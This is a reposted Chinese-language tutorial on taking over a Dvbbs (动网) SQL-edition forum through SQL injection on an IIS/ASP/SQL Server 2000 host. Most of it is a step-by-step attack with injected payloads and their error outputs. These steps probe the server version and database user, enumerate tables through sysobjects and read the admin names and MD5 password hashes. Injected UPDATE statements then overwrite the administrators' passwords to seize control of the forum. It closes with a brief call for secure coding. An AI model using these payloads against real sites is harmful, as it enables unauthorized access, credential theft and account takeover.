再谈SQL注入入侵动网SQL版论坛

80酷酷网    80kuku.com

  现在动网最新版本是7.0+SP2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在IIS+ASP+SQL2000的组合是比较常见的。而一个网站运用大量的ASP脚本程序,难免不出纰漏。如果一台主机上存在某个SQL注入点,而这台主机又安装有动网SQL版的话,基本上可以得出结论:这个动网就是你的了。下面来看一下实例。

  一、 首先确定目标

  假设以下URL存在SQL注入:
测试能否注入可以在6后面加个单引号。
返回错误提示:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。

  继续,先探测一下系统版本:
version)--
  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。

  看来已经打上最新的SP4补丁。

  取得当前连接数据库用户:
user_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'webuser' 转换为数据类型为 int 的列时发生语法错误。

  从错误信息中得到当前数据库用户为:webuser
  取得当前连接数据库名:
db_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 '01city' 转换为数据类型为 int 的列时发生语法错误。

  从错误信息中得到当前数据库名为: 01city

  接下来测试下权限:(注:因为我们的目的是搞定动网而不是侵占系统。所以数据库权限对我们不是很重要。)
IS_SRVROLEMEMBER('sysadmin'))--

  返回错误信息。提示当前记录已删除。看来权限果然不是很高耶。继续,
))--

  正常显示信息,看来连接数据库拥有的权限是DB_OWNER(DOWN数据库所有者。但对操纵数据是绰绰有余了。

  二.得到数据库表名

  不出意外的话动网的各个表就存在于当前数据库01city中。

  首先得到第一个表:
top 1 name from sysobjects where xtype='u' and status>0 and name not in(''))--
返回:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'address' 转换为数据类型为 int 的列时发生语法错误。

  好的,第一个表名出来了,为: address

  继续,
top 1 name from sysobjects where xtype='u' and status>0 and name not in('address'))--

  返回:

  admin 第二个表名也出来了。依次类推, 提交:
top 1 name from sysobjects where xtype='u' and status>0 and name not in('address','admin',...))--

  可以得到当前数据库中所有表名。

  不一会儿,结果出来了, 表名好眼熟啊。

  "address","admin","bbslink","bbsnews","board","user".........傻瓜都看的出这是动网的表。当然还有其它的一些表,我们不去管它。

  接下来就好办了,也不要去猜字段了,我们打开自己的动网数据库看一下就知道了。 既然有了表名,字段名,那么,动网不就在你掌握之下了吗? 但千万不要 drop table啊。 破坏就不好了。我们的目的是演练技术,提高水平。 好,那么,我们去得到动网的后台。

三、进入后台,取得动网论坛管理员权限

  先看看后台有多少个管理员:
and 4=(select count(username) from admin)--
  返回错误: 当前的记录已被删除。说明管理员少于4位。直接提交,
and 1=(select count(username) from admin)--

  正常显示信息,看来管理员只有一个,读出管理员名字,
username from admin)--

  出来了,管理员后台登陆名为: 01city

  继续读出管理员后台登陆密码:
password from admin)--

  很顺利,密码为: e7cc01be0e33a273

  是MD5加密过的。难道要去破解它吗? 别急,根本不需要去破MD5密码。

  由于动网后台管理是COOKIE+SESSION认证。所以只有管理员在前台登陆才可以进后台管理,一般用户是无法进后台管理的。即使后台用户和密码都知道的情况下也一样。所以我们还要取得前台管理的用户和密码。 这个很容易,在他论坛注册一个用户查看一下管理团队,得出,前台管理用户为: admin

  好,得到他的密码:
userpassword from user where username='admin')--

  返回,admin的前台密码为:e7cc01be0e33a273

  同样是MD5的。 现在利用COOKIE欺骗可以登陆它的前台管理了。但是还有别的办法吗?别忘了现在我们可是对它的数据库拥有生杀大权哦。聪明的你可能想到了,对 ,就是,update。 我们来提交:
user set userpassword='49ba59abbe56e057' where username='admin';--

  正常返回信息,应该成功执行了,查看一下:
userpassword from user where username='admin')--

  返回值为: 49ba59abbe56e057

  更改密码成功,说明一下,这个16位MD5是预先算好的。你要知道它的明文密码。

  那么同样的,我们更改一下后台的管理密码.先把后台用户改成和前台用户一样的,提交:
admin set username='admin' where username='01city'--

  查看一下:
username from admin)--

  更改成功,后台管理员现在已变成:admin 接下来更改密码,提交:
admin set password='49ba59abbe56e057' where username='admin'--

  查看一下:
password from admin)--

  更改成功,后台管理员密码已经变成:49ba59abbe56e057

  到这里为止,动网已彻底沦陷。你可以用admin登陆前台然后再用相同的密码进后台管理了。

  四、总结

  就这样并不算太艰难的实现了对动网的控制。通过这次善意的渗透测试,也暴露出SQL INJECTION攻击的可怕性。而对于IIS+ASP+SQL2000的虚拟主机来说简直就是防不胜防。只要主机上有一个SQL注入点的话,动网就将面临灭顶之灾了。而其实从服务器庞大的网站程序中找一个这样的SQL注入点并不算难事.正应征了一句老话:千里之堤,溃于蚁穴。所以防范这样的攻击的最好办法是加强程序代码的安全性。安全是个整体,任何细微的错误都有可能导致严重后果。

分享到
  • 微信分享
  • 新浪微博
  • QQ好友
  • QQ空间
点击: